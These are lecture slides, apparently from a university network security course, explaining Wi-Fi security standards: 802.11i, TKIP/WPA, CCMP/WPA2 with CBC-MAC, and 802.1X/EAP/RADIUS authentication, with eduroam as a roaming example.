Page 55

Overview of 802.11i

• After the collapse of WEP, IEEE started to develop a new security architecture → 802.11i
• 802.11i novelties compared to WEP
  – Access control model based on 802.1X
  – Flexible authentication framework (using EAP)
    • Authentication based on strong protocols (e.g., TLS)
    • Authentication results in shared session key
  – Different functions (encryption, integrity) use different keys derived from the session key using a one-way function
  – Improved encryption and integrity protection

Page 56

Overview of 802.11i

• 802.11i defines concept of a Robust Security Network (RSN)
  – Integrity protection and encryption based on AES (not RC4 anymore)
  – Good, but requires new hardware → no software update of routers possible
• For immediate security: updates to WEP
  – So-called pre-RSN networks
  – New protocol: Temporal Key Integrity Protocol (TKIP)
  – Encryption based on RC4 but avoids WEP’s problems
  – For integrity, a novel scheme is proposed (called Michael)
  – Ugly solution, but runs on old hardware (after software upgrade)
• Industry names
  – TKIP → WPA (WiFi Protected Access)
  – RSN → WPA2

Page 57

802.11i Security Solutions

                        WEP             TKIP (WPA)                       CCMP (WPA2)
Algorithm               RC4             RC4                              AES
Key Length              40 / 104 Bit    128 Bit (enc.), 64 Bit (auth.)   128 Bit
Initialization Vector   24 Bit IV       48 Bit IV                        -
Integrity (Data)        CRC32           Michael                          CCM (Counter with CBC-MAC)
Integrity (Header)      none            Michael                          CCM
Replay Protection       none            IV-Check                         IV-Check
Key Management          none            802.11i 4-Way-Handshake          802.11i 4-Way-Handshake

Page 58

Wireless LANs: Wi-Fi Protected Access (WPA)

Temporal Key Integrity Protocol (TKIP)

Page 59

TKIP

• Runs on old hardware
  – Uses RC4 for encryption with WEP weaknesses corrected
• Improved message integrity scheme
  – New protection mechanism called Michael
  – Message Integrity Check (MIC) value is added at SDU level before fragmentation into PDUs
  – Implemented in the device driver (in software)
• Improved confidentiality scheme
  – Per-packet keys to prevent attacks based on weak keys
  – Increases IV length to 48 Bits to prevent IV reuse
  – Use IV as replay counter

Page 60

TKIP: Overview (High-Level)

[Figure: Message → Integrity Protection → Payload & MIC → WEP Encryption → Encrypted and authenticated frames; Key Generation from the Extended IV yields the WEP IV and WEP Key used by WEP Encryption]

Page 61

TKIP: Integrity Protection

[Figure: the Michael Algorithm takes the Message, Source MAC, Destination MAC, Priority and a 64 Bit Key and produces the Message MIC, which is carried in the WEP Frame; slide annotation: MIC? MAC?]

Page 62

TKIP: WEP Key Generation

[Figure: Key Mixing (Phase 1) takes the Sequence Counter (48 Bit) MSB (32 Bit), the Source MAC (32 Bit) and the WEP Key (128 Bit) and produces an 80 Bit intermediate value; Key Mixing (Phase 2) combines it with the Sequence Counter LSB (16 Bit) into the Packet-specific Key, i.e. the Temporary WEP Key (128 Bit) used for encryption, whose IV bytes are Low Byte of Counter, Fill Byte, High Byte of Counter]

Page 63

WEP and TKIP: Encryption (High-Level)

[Figure: Message = Payload + WPA-MIC → CRC-32 Algorithm → Message + WEP-ICV → RC4 with the Temporary WEP Key (128 Bit) used for encryption → Encrypted Message = Payload + WEP-ICV]

Page 64

TKIP: Overview (WEP Frame Details)

[Figure: Message → Integrity Protection → Payload + MIC → WEP Encryption → Encrypted and authenticated frames; Key Generation from IV + EIV yields the WEP IV and WEP Key]

Frame layout: MAC Header | IV and Key ID | EIV | Payload | MIC | WEP ICV | FCS

Page 65

Wireless LANs: Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)

Page 66

CCMP and WPA2

• Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)
• Standard encryption protocol for use with the WPA2 standard
• Replaces
  – RC4 stream-cipher with AES block cipher
  – WEP ICV with (CBC-)MAC value based on AES

Page 67

CCMP and WPA2

• Encryption
  – Based on CTR mode (using AES); see chapter on cryptology
  – Encrypts payload and MAC value to protect integrity and confidentiality
  – Not encrypted: Headers of MAC (frame) and CCMP
• Integrity protection
  – Cipher Block Chaining Message Authentication Code (CBC-MAC)
  – Integrity protection based on CBC-MAC (using AES)
  – See next slide

Page 68

CBC-MAC: Cipher Block Chaining MAC

• Uses a block cipher to create a message authentication code (MAC)

[Figure: Initialization Vector (IV) ⊕ Plaintext chunk #1 → Block Cipher (Key) → ⊕ Plaintext chunk #2 → Block Cipher (Key) → ⊕ Plaintext chunk #3 → Block Cipher (Key) → MAC]

Page 69

CCMP: Integrity

• CBC-MAC computed over
  – MAC header
  – CCMP header
  – Payload
• Mutable fields are set to zero
• Input is padded with zeros if length is not multiple of 128 Bits

Page 70

Wireless LANs: IEEE 802.1X / EAP / PEAP

Page 71

Authentication via IEEE 802.1X

• Access to resources after successful authentication
  – IEEE 802.1X: EAP over Ethernet/LAN (EAPOL)
  – For details on EAP see chapter on AAA

[Figure: Client (Supplicant) ↔ Authenticator (e.g., access point) via IEEE 802.1X: EAP over Ethernet; Authenticator ↔ Authentication Server (e.g., RADIUS) via an arbitrary protocol; EAP Messages flow end to end between Client and Authentication Server]

Page 72

Association and Authentication

• 802.11 association happens first
  – Open authentication
  – Provides access to the AP and allows an IP address to be supplied
• Access beyond the AP is still prohibited
  – AP drops non-EAP traffic
• Authentication conversation between supplicant and authentication server
  – Wireless NIC and AP are pass-through devices
• After authentication, AP allows full traffic

Page 73

Summary of the Protocol Architecture

[Figure: protocol stack between Client, Access Point and Authentication Server]
  Client ↔ Access Point: 802.11 (WiFi), EAPOL (802.1X)
  Access Point ↔ Authentication Server: TCP/IP, RADIUS protocol (RFC 2865), EAP over RADIUS (RFC 3579)
  Client ↔ Authentication Server (end to end): EAP (RFC 3748), e.g., PEAP, e.g., EAP-MS-CHAPv2

Page 74

802.11, 802.1X, EAP (with CHAP + RADIUS)

[Message sequence between Supplicant (WiFi Client), Authenticator (Access Point) and Authentication Server]
  1. 802.11 association (Supplicant ↔ Access Point)
  2. EAPOL Start (Supplicant → Access Point)
  3. EAP request for identity (Access Point → Supplicant)
  4. EAP-response (identity) (Supplicant → Access Point); Access-request (Access Point → Authentication Server)
  5. RADIUS-challenge (Authentication Server → Access Point); EAP-request (challenge) (Access Point → Supplicant)
  6. EAP-response (response) (Supplicant → Access Point); RADIUS-access-request (Access Point → Authentication Server)
  7. RADIUS-access-accept (Authentication Server → Access Point); EAP-success (Access Point → Supplicant)
  8. EAPOW-key (WEP/CCMP) (Access Point → Supplicant)
  9. Secure authenticated connection

Page 75

Result of successful authentication

• Authenticator and Client negotiate a private unicast key
  – Prevents other associated clients from eavesdropping on the communication
• Authenticator also provides a broadcast key
  – For broadcast communication amongst all associated clients

[Figure: 802.11 Client ↔ 802.11 AP ↔ 802.11 Client; each client shares a Private Unicast Key with the AP, and all clients share one Shared Broadcast Key]

Page 76

Example: Eduroam (Germany)

• Users can roam to university-run Wi-Fis worldwide
• Authentication by home organization

Page 77

Example: Eduroam (Germany)

• Requests are routed to the user’s home organization’s authentication server
  – Based on “realm”: username@realm
  – E.g., [email protected]
• Authentication
  – Uses a secure PEAP (TLS) tunnel to the server
  – Server provides certificate to avoid man-in-the-middle attacks
  – Authenticate using some EAP-method (e.g., MS-CHAPv2 at Lübeck)

Page 78

Example: Dennis visits Lübeck

1. Lübeck‘s RADIUS requests identity
   – Dennis replies with dennis@uni-heidelberg.de
2. Realm is unknown to RADIUS server
   – Forwards all EAP packets to DFN central RADIUS server
3. Berlin knows mapping <realm, RADIUS server>
   – Forwards packets to Heidelberg
4. Virtual EAP connection between Dennis’ computer and Heidelberg RADIUS server
   – Dennis authenticates against this server
   – Server presents certificate to authenticate towards Dennis
5. After authentication, access is granted locally

[Figure: Lübeck → Berlin (step 2) → Heidelberg (step 3), with the virtual EAP connection (step 4) between Lübeck and Heidelberg]

Page 79

Visitor from SF comes to Lübeck

[Figure: San Francisco → New York → Berlin → Lübeck]

Page 80

Summary on WiFi Security

• Security has always been considered important for WiFi
  – Early solution based on WEP seriously flawed
• New security standard for WiFi: 802.11i
  – TKIP (WPA)
    • Uses RC4 → runs on old hardware
    • Corrects WEP’s flaws
    • Mandatory in WPA, optional in WPA2
  – CCMP (WPA2)
    • Access control model based on 802.1X and EAP → improved key management
    • Uses AES in CCMP mode (CTR mode and CBC-MAC)
    • Needs new hardware that supports AES
